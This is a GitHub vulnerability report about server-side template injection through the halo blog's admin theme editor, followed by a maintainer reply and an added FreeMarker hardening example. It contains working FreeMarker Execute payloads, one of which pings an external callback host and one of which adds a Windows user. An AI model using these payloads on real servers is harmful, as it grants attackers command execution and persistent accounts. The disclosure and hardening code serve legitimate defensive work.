unsafe template file permissions edit cause Server Side Template Injection(SSTI) #440

Closed
5 tasks
c0d1007 opened this issue Dec 24, 2019 · 6 comments
Labels
kind/support Categorizes issue or PR as a support question. vulnerability Vulnerability

Comments

@c0d1007

c0d1007 commented Dec 24, 2019

I confirm that I have checked (mark [ ] as [x])


I am submitting (mark [ ] as [x])

  • [x] Bug report
  • Add a new feature or functionality
  • Request technical support

Testing environment

java version:1.8.0_181
os system: windows
server ip address:192.168.126.136

Vulnerability Test

Simple test

Access http://192.168.126.136:8090/admin/ and log in to the backstage. Click exterior (外观) and select theme editor (主题编辑). Select any one of the template files, such as "page-top.ftl". Then edit the file and insert a template statement like this.

payload-1

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ping ggggga.2xxxxxj.ceye.io") }

Save the file and refresh the home page, and then the ceye platform can receive a message.

Execute system command

Also edit "page-top.ftl" to execute a system command to add a system user.

payload-2

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("net user security security /add") }

Save the file again and refresh the home page again. Then a user will be added to the system.

Remark

Because the preview does not display the pictures properly when editing the issue, you can visit my GitHub project (https://github.com/c0d1007/exploit) and view the pictures.

Solution

Only allow template files to be edited locally, or check the file input.
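
A common FreeMarker hardening for the `?new` step that both payloads above depend on, as an added example that is not part of the original issue and not halo's code (it does not describe what #419 changed). The class name `SaferFreemarkerConfig`, its method names and the two template strings are constructed for illustration, and FreeMarker 2.3.23 or later is assumed on the classpath:

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;
import freemarker.template.TemplateExceptionHandler;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Collections;

// Added example with hypothetical names; not taken from the halo code base.
public class SaferFreemarkerConfig {

    // Builds a Configuration whose ?new built-in refuses Execute,
    // ObjectConstructor and JythonRuntime.
    static Configuration hardened() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_23);
        // The default is UNRESTRICTED_RESOLVER, which is what lets a template
        // instantiate freemarker.template.utility.Execute.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
        // ?api is off by default; set it explicitly so a later change stands out.
        cfg.setAPIBuiltinEnabled(false);
        // Fail the render instead of writing error details into the page.
        cfg.setTemplateExceptionHandler(TemplateExceptionHandler.RETHROW_HANDLER);
        return cfg;
    }

    // Renders the source with cfg and reports whether FreeMarker refused it.
    static boolean isRejected(Configuration cfg, String name, String source) throws IOException {
        Template template = new Template(name, new StringReader(source), cfg);
        try {
            template.process(Collections.emptyMap(), new StringWriter());
            return false;
        } catch (TemplateException e) {
            return true;
        }
    }

    public static void main(String[] args) throws IOException {
        Configuration cfg = hardened();
        // Constructed inputs: only the instantiation step from the report is
        // used, so no command is involved even if the resolver were missing.
        String probe = "<#assign ex=\"freemarker.template.utility.Execute\"?new()>";
        String benign = "<#assign title=\"Hello\">${title}";
        System.out.println("probe rejected:  " + isRejected(cfg, "probe.ftl", probe));
        System.out.println("benign rejected: " + isRejected(cfg, "benign.ftl", benign));
    }
}
```

`TemplateClassResolver.ALLOWS_NOTHING_RESOLVER` is the stricter choice when no theme needs `?new` at all. The resolver only governs `?new`, so who may edit templates still needs its own access control.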

@JohnNiang
Member

This issue seems to be fixed here: #419.

@c0d1007
Author

c0d1007 commented Dec 25, 2019

Has the vulnerability been fixed?

@c0d1007
Author

c0d1007 commented Dec 25, 2019

Can I find you in the halo QQ group? I want to know how to fix it, because I used your blog.

@JohnNiang
Member

JohnNiang commented Dec 25, 2019

> Can I find you in the halo QQ group? I want to know how to fix it, because I used your blog.

dc3a73e

But the newest version of halo has not been released.

@JohnNiang JohnNiang added kind/support Categorizes issue or PR as a support question. vulnerability Vulnerability labels Dec 25, 2019
@c0d1007
Author

c0d1007 commented Dec 25, 2019

OK, thank you.

@JohnNiang
Member

> OK, thank you.

But you have to test it before using.

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* refactor: sheet editing

Signed-off-by: Ryan Wang <i@ryanc.cc>